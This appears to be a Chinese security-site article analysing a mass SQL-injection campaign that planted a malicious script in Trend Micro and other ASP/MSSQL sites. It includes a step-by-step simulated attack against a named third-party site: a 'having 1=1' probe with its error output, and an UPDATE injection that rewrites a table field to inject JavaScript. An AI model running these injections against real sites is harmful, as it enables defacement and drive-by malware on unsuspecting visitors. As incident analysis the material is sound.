首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

关于趋势科技等网站被攻击的分析

所属分类: 网络安全 / 黑客教程 阅读数: 741
收藏 0 赞 0 分享
一. 首先在网上找到了这次攻击的新闻报道 http://www.nsfocus.net/news/6697 http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html 通过GOOGLE搜索到了相关被黑的页面 http://www.google.cn/search?hl=zh-CN&q=site:trendmicro.com www.2117966.net f**kjp.js&btnG=Google 鎼滅储&meta=&aq=f 趋势科技的页面被插入过http://www.2117966.net/f**kjp.js相关的JS挂马。
二. 直接查找这个JS相关的信息 http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net f**kjp.js&meta=&aq=f 发现了12,500项符合的结果,这些返回的结果信息都是当前页面被插入了JS挂马。 通过分析发现被黑的页面都有如下特征: 1.被修改页面的网站都是ASP MSSQL的架构。 2.被修改的页面都存在SQL注入漏洞。
三. 取了其中一个被挂马页面做了SQL注入挂马的模拟攻击: 1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 这个链接存在明显的SQL注入,对person参数注入语句having 1=1,将暴出当前页面注入点的表名为coordinator,字段名ShCoordinatorSurame。 http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 having 1=1 —————————
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘coordinator.ShCoordinatorSurame’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20
—————————- 2. 修改暴出的当前页面的表名,字段名内容为插入JS的代码来实现挂马 http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162;update coordinator set ShCoordinatorSurame=’’ where 1=1–– 修改coordinator 表 ShCoordinatorSurame 字段内容为,同时设一个1=1为真的逻辑条件就可以修改当前页面查询数据的内容. 就可以实现在有SQL注入点的页面直接挂马。
四.总结. 这次大规模攻击的流程应该是自动化的: 1.通过先进的扫描技术批量收集到几万网站的SQL注入漏洞。 2.针对漏洞攻击,进行自动化的SQL注入挂马。 现今虽然SQL注入漏洞已经很老了,但是这次黑客在一天内同时对数万网站攻击挂马的技术却是很惊人的,连趋势这样的安全公司也未能幸免。
更多精彩内容其他人还在看

浅析2016年DDoS攻击现状与防御机制

防御DDoS攻击指南,随着Internet互联网络带宽的增加和多种DDOS黑客工具的日新月异的发展,DDOS拒绝服务攻击的实施越来越容易,DDOS攻击事件正在成上升趋势,解决DDOS攻击问题成为网络服务商必须考虑的头等大事
收藏 0 赞 0 分享

木马病毒的查杀过程详细介绍

这篇文章主要介绍了木马病毒的查杀过程详细介绍的相关资料,需要的朋友可以参考下
收藏 0 赞 0 分享

Web 安全之Cookie劫持详细介绍

这篇文章主要介绍了Web 安全之Cookie劫持详细介绍的相关资料,需要的朋友可以参考下
收藏 0 赞 0 分享

蹭网占了点小便宜?黑客能让你亏大发

现在我们的生活离不开网络,走到哪里都有网络的存在,就算是公共场合,也会有免费的WiFi,那么这些网络是否安全呢?下面下面就为你解答,一起来看看吧
收藏 0 赞 0 分享

详解黑客修改WordPress核心文件,劫持网站流量

现在做网站的都害怕一件事,那就是怕自己的网站被黑,否则不论我们怎么用心的去维护我们的网站,流量也是上不去的,下面小编为大家介绍网站被用来传播有关Windows序列号的广告内容
收藏 0 赞 0 分享

详解服务器三大攻击杀手(DDoS CC攻击 ARP欺骗)

大家都知道服务器的攻击有很多种,但是有三种主流的攻击,那就是DoS攻击、CC攻击以及ARP欺骗,下面小编就为大家具体的讲解这三种攻击
收藏 0 赞 0 分享

交换机网络嗅探方法 ARP欺骗辅助嗅探

很多人认为ARP攻击顶多就是把一些机器搞得不能上网,但自从交换机成为架设局域网的主流设备后,ARP攻击有了新的用途:用ARP欺骗辅助嗅探!感兴趣的小伙伴们可以参考一下
收藏 0 赞 0 分享

交换机网络嗅探方法 如何欺骗交换机缓存

用ARP欺骗辅助嗅探是一种比较旧的方式,现在的局域网机器很多都装了ARP防火墙!如果机器装了ARP防火墙,ARP欺骗辅助嗅探方式就没用了,那还有其他的方式吗?答案是肯定的,那就是欺骗交换机缓存!下文为大家进行详细分析。
收藏 0 赞 0 分享

反弹技术角度对DDOS攻击进行分析

本文利用反弹技术进行DDOS攻击的分析,通过发送大量的欺骗请求数据包给Internet上大量的服务器群,而这些服务器群收到请求后将发送大量的应答包给victim,对这方面感兴趣的可以阅读本文。
收藏 0 赞 0 分享

高手轻松教你如何针对DDos部署防御措施

DDoS攻击的主要手段是通过大于管道处理能力的流量淹没管道或通过超过处理能力的任务使系统瘫痪,所以理论上只要攻击者能够获得比目标更强大的“动力”,目标是注定会被攻陷的,对DDoS攻击防御感兴趣的朋友可以参考一下
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 StudyWeb.Cn Some Rights Reserved.
沪ICP备13040166号-18